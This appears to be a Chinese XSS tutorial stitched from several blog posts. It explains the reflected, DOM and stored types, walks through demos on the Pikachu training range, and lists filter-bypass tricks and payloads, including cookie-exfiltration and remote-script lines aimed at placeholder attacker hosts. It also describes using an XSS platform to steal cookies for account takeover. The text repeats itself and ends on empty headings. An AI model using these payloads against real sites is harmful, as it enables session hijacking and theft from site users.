一、了解XSS漏洞是什么

1.XSS定义

XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript，但实际上也可以包括Java、
VBScript、ActiveX、 Flash
或者甚至是普通的HTML。攻击成功后，攻击者可能得到包括但不限于更高的权限（如执行一些操作）、私密网页内容、会话和cookie等各种内容。

图片来源: 地址.

2.XSS危害

1. 植入键盘记录器。（也就是可以记录键盘输入的内容）
2. 攻击受害者所在的局域网。
3. 代理转发流经被攻击者的所有 Web 流量，即实施中间人攻击。
4. 窃取或篡改应用 cookie 用于会话劫持。
5. 更改被攻击者 Web 应用的显示内容。
6. 绕过 CSRF 安全防护措施。
7. 创建包含恶意 JavaScript 代码的虚假网站以及到该网站页面的链接
8. 发送嵌入恶意 Web URL 的电子邮件。
9. 使用 URL 短码隐蔽真实 URL。

3.XSS漏洞产生原因

程序员对网页输入框没有做严格的过滤，导致楼哦对那个的出现，也是互联网上严重性很高的漏洞，原则上只要有输入框救会存在，这就要看开发人员的过滤水平的高低了。

二、XSS漏洞分类

分类	特点
反射性XSS	针对客户端，非永久性保存
DOM形XSS	针对客户端，非永久性保存
存储形XSS	针对客户端，永久性保存

1.反射性XSS

（1）什么是反射型XSS

反射性XSS就是在页面的输入框中，在没有被过滤的情况下，写入JS脚本标签，在前端页面中显示效果，因为是非持久性的所以，当客户端进入网页的时候，脚本就执行一次，下一次就不会继续执行了。

通常情况下利用的位置是在网站的输入框，url框等

（2）演示

首先这里用皮卡丘靶场作为演示场。
<1>.测试特殊符号是否报错 <>“”

<2>.发现报错who is <>“”,i don't care!

<3>.打开控制台查看前端代码
看到这里你在输入框的输入特殊字符被识别为一个语句输出

<4>.写入标签代码<script>alert(“我是最帅的”)</script>

这里有一个地方要注意，输入框被限制了长度，需要在控制台自行改动一下

<5>.复制连接新开一个页面试一下

<6>.新打开的链接显示跳出了弹框

<7>.那么我们刷新页面试一下
刷新后的url

这时候刷新页面后 上面的url发生了变化，这也说明了反射型XSS的特性，非持久性

2.DOM型XSS

（1）什么是DOM型XSS

在JS中可以改变正规HTML的框架和文本。JS对页面进行操作的时候，是需要有一个接口对HTML页面进行连接。这个中间桥梁就是DOM，在这个中间更改一些代码，可以进行一些操作。这就是DOM型XSS。

通常这个利用的位置是在网页输入框

（2）演示

<1>.输入特殊符号检测<>//""
页面显示what do you see?

<2>.打开终端查看代码

在这里我们是可以看到有一个闭合方式的存在。

<3>.尝试闭合"<script>alert("我是最帅的")</script>"

可以看到这里的尝试闭合是没有作用的，没有起到任何作用，将所有代码都当作了链接地址。

<4>.那么我们应该怎么去填写我们的脚本呢？

知道js语法事件的同学肯定是很轻松就能过去的。
<5>.尝试闭合，i love you"'

我们可以非常清楚的看到闭合，那么我进行事件写入看一下。

<6>.事件写入 i love you" ' onclick="alert('我是最帅的')"
我们可以看到这里我们成功的写入了进去。

<7>.点击查看

这里显示了我们添加进去的事件，所以说，在测试时还是需要多了解javascript的用法

3.存储形XSS

（1）什么是存储型XSS

存储型XSS就是应用程序直接将攻击者提交的代码存储到数据库中进行保存，这样就可以永久的显示在用户的前端页面上。（说白了也就是，将代码存到前端页面上，比如说你写上传了一个脚本图片存储在网页上，只要有人进入这个网站，那么就会在前端页面上执行，钓鱼网站同理。）

通过利用位置在网页可以将输入内容存储到数据库的地方。

（2）演示

<1>.特殊符号进行测试 <>""
这里我们可以看到存储进去了.

<2>.打开控制台，查看代码

<3>.写入脚本

<4>.复制链接打开

还是可以显示 ，这不能证明存储型的持久性，我们继续测试。

<5>.刷新页面

还是显示，后面我多次刷新发现只要我不删除就可以一直存在。

三、XSS绕过

1.标签外

（1）直接添加标签绕过

这个请看上面的反射型XSS演示。

1.标签内

（1）构造闭合

这个请看上面的DOM型XSS演示。

（2）填写事件

这个请看上面的DOM型XSS演示。，不同标签下事件是不同的，当遇到的时候百度搜索就可以了解到。

（3）大小写绕过

绕过演示

<1>.输入特殊字符检测
这里检测后很明显是没有饶过
<2>.输入标签尝试
这里也是非常明显，标签内不可以添加标签

<3>.添加事件尝试”/><a href ='javascript:alert("企鹅兄最帅")'>a</a>

这里还是一样的被过滤了，那么尝试其他方法

<4>.大小写绕过尝试"><a Href ='javascript:alert("企鹅兄最帅")'>a</a>

后面的绕过不做演示

（4）双写绕过

<script>
改为
<scr<script>ipt>

（5）编码转译绕过

16进制：x+16进制;
HTML编码：&#+10进制/16进制+；
JS编码：利用String.fromCharCode函数将 Unicode 编码转为字符
base64编码：eval()用于将字符串当作程序执行，atob()用于解密base64

（6）空格、回车、table绕过

空格：

javascript:alert('xss');
可以改为
java script:alert('xss');

回车：

javascript:alert('xss');
可以改为
java 
script:alert('xss');

Tab：

javascript:alert('xss');
可以改为
java	script:alert('xss');

（7）非闭合标签

<script>
可以改为
<script

（8）利用特性进行绕过

这个对版本的限制很强，这里不同版本问题不一样，这里就不总结了。

四、小结

企鹅兄在这里希望大家在这里可以学到一些等下，真诚的希望大佬们指出错误，你的建议就是我坚持的动力

目录

1.XSS跨站脚本漏洞简介

2.XSS漏洞分类

3.XSS漏洞原理

4.XSS漏洞利用

4.1XSS基础漏洞利用  

4.2XSS平台利用

5.XSS攻击过程

6. XSS漏洞防护

---

1.XSS跨站脚本漏洞简介

        XSS又叫CSS（cross site script），即跨站脚本攻击，是常见的Web应用程序安全漏洞之一。XSS最大的特点就是能注入恶意的HTML/JavaScript代码到用户浏览的网页上，是因WEB应用程序对用户输入过滤不足而产生的，当用户浏览这些网页时，就会执行其中的恶意代码。由于HTML代码和客户端JavaScript脚本能在受害者主机上的浏览器任意执行，这样等同于完全控制了WEB客户端的逻辑，在这个基础上，黑客可以轻易地发起Cookie窃取，会话劫持，钓鱼欺骗等各种各样的攻击。

        攻击流程：

2.XSS漏洞分类

        （1）反射型XSS：<非持久化> 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码（服务器中没有这样的页面和内容），一般容易出现在搜索页面。
        （2）存储型XSS：<持久化> 代码是存储在服务器中的，如在个人信息或发表文章等地方，加入代码，如果没有过滤或过滤不严，那么这些代码将储存到服务器中，每当有用户访问该页面的时候都会触发代码执行，这种XSS非常危险，容易造成蠕虫，大量盗窃cookie（虽然还有种DOM型XSS，但是也还是包括在存储型XSS内）。
        （3）DOM型XSS：基于文档对象模型Document Objeet Model，DOM)的一种漏洞。DOM是一个与平台、编程语言无关的接口，它允许程序或脚本动态地访问和更新文档内容、结构和样式，处理后的结果能够成为显示页面的一部分。DOM中有很多对象，其中一些是用户可以操纵的，如uRI ，location，refelTer等。客户端的脚本程序可以通过DOM动态地检查和修改页面内容，它不依赖于提交数据到服务器端，而从客户端获得DOM中的数据在本地执行，如果DOM中的数据没有经过严格确认，就会产生DOM XSS漏洞。

3.XSS漏洞原理

        XSS攻击是在网页中嵌入客户端恶意脚本代码，这些恶意代码一般是使用JavaScript语言编写的。JavaScript可以用来获取用户的Cookie、改变网页内容、URL跳转，攻击者可以通过向Web页面注入JavaScript代码，来实现这些目的。

4.XSS漏洞利用

4.1XSS基础漏洞利用
        （1）漏洞利用
        盗取cookie：

<script>alert(document.cookie)</script>

        构造页面跳转：

<script>location='https"//www.hacker.com'</script>

        构造获取cookie并发送到远程主机：

<script>document.location='http://127.0.0.1/test/cookie.phpcookie='+document.cookie</script>

        （2）常见注入点
        重灾区：评论区、留言区、个人信息、订单信息等
        针对型：站内信、网页即时通讯、私信、意见反馈
        存在风险：搜索框、当前目录、图片属性等
        白盒测试(代码审计)

        （3）常用payload　
        Script标签：

<script>alert(/1/)</script>
<script>prompt(1)</script> 
<script>confirm(1)</script>
<script src="http://attacker.org/malicious.js"></script>
<script src=data:text/javascript,alert(1)></script>
<script>setTimeout(alert(1),0)</script>

　　　Img标签：

<img src=x onerror=alert(1)>　　
<img src=x onerror=prompt(1);>
<img src=javascript:alert('1')>

        a标签:

<a href=”javascript:alert(1)”>点击触发</a>
<a href="http://www.hacker.com">点击触发</a>

        （4）常见绕过方法
　　　　大小写绕过（<SCRIPT>、<scRiPt>等）
　　　　双写绕过（<SCr<scRiPT>ipt>）
　　　　关键字HTML编码绕过
　　　　任意位置插入null字符（<im[%00]g οnerrοr=alert(xss) src=a>）
　　　　JavaScript转义（<script>eval(‘a\154ert(1)’)</script>）

4.2XSS平台利用

         XSS漏洞平台利用也叫漏洞利用框架，作用上来看就是一组“JavaScript工具集合”，比如：键盘输入记录、盗取cookie、表单劫持等。

        网上类似的平台很多，都是基于XSS Platform搭建的。登录XSS Platform（可自行搜索获取，也可以进行自己搭建），主界面如下：

可以进行创建项目，选择攻击模块，之后便可能生成相关的攻击代码：

         当XSS Platform收到信息之后，就可以确定网站存在XSS跨站漏洞，并且可以拿到cookie信息，借此绕过账号密码登录目标账户。

5.XSS攻击过程

反射型XSS漏洞：
        Alice经常浏览某个网站，此网站为Bob所拥有。Bob的站点需要Alice使用用户名/密码进行登录，并存储了Alice敏感信息(比如银行帐户信息)。
Tom 发现 Bob的站点存在反射性的XSS漏洞，Tom编写了一个包含恶意代码的URL，并利用各种手段诱使Alice点击，Alice在登录到Bob的站点后，浏览了 Tom 提供的URL，嵌入到URL中的恶意脚本在Alice的浏览器中执行。此脚本盗窃敏感信息(cookie、帐号信息等信息)。然后在Alice完全不知情的情况下将这些信息发送给 Tom。
        Tom 利用获取到的cookie就可以以Alice的身份登录Bob的站点，如果脚本的功更强大的话，Tom 还可以对Alice的浏览器做控制并进一步利用漏洞控制
存储型XSS漏洞：
        Bob拥有一个Web站点，该站点允许用户发布信息/浏览已发布的信息。
Tom检测到Bob的站点存在存储型的XSS漏洞。Tom在Bob的网站上发布一个带有恶意脚本的热点信息，该热点信息存储在了Bob的服务器的数据库中，然后吸引其它用户来阅读该热点信息。Bob或者是任何的其他人如Alice浏览该信息之后,Tom的恶意脚本就会执行。Tom的恶意脚本执行后，Tom就可以对浏览器该页面的用户发动一起XSS攻击。

6. XSS漏洞防护

        XSS跨站漏洞最终形成的原因是对输入与输出没有严格过滤，在页面执行JavaScript等客户端脚本，理论上来讲只要将敏感字符过滤，即可修补XSS跨站漏洞。

        防护方法可以参考：XSS(跨站脚本攻击)漏洞解决方案 - boboxing2017 - 博客园

                        XSS(跨站脚本)漏洞详解之XSS跨站脚本攻击漏洞的解决_谁动了我的bug的博客-CSDN博客_xss跨站脚本攻击

 跨站脚本漏洞(XSS)基础讲解 - 简书

xss(跨站脚本攻击）漏洞原理实战 - 知乎

跨站 脚本攻击 （ XSS ） 是安全威胁 一直 比较高 的 web 漏洞 。其最大的特点就是诸如一些html和JavaScript代码到用户的浏览器网页上。

一、分类：

1. Demo型：

DOM 型 XSS 是 基于 DOM 文档 对象模型的一种漏洞，所以 ，受 客户端浏览器的脚本 代码所影响。

2.存储型：

存储型xss一般作用时间比较长而且影响的范围也比较广，如果界面 中的内容过滤不严格，恶意脚本被存储到服务器的网站后台数据库中。当其他用户浏览 该网页时，站点即从数据库中读取用户存入的非法数据，然后显示在页面中，即在受害者的主机的浏览器上执行恶意代码。

3.反射型：

反射型 XSS ，非持久化，需要欺骗用户自己去点击链接才能触发 XSS 代码（服务器 中没有这样的页面和内容），一般容易出现在搜索页面。
它的特点是旨在用户单击时触发，而且只执行一次，非持久化 ， 所以称为反射型跨站式脚本。

二 字符绕过:

1、大小写绕过

2、黑名单绕过

3、触发事件

包括onclick(),oninput(),onerror()等
和网页源代码内标签变化以及这些事件的执行相结合，要不时的查看网页代码变化进行绕过和添加元素进行执行。

4、编码绕过

三、构造xss脚本

常用html标签：
常用Javascript方法
脚本：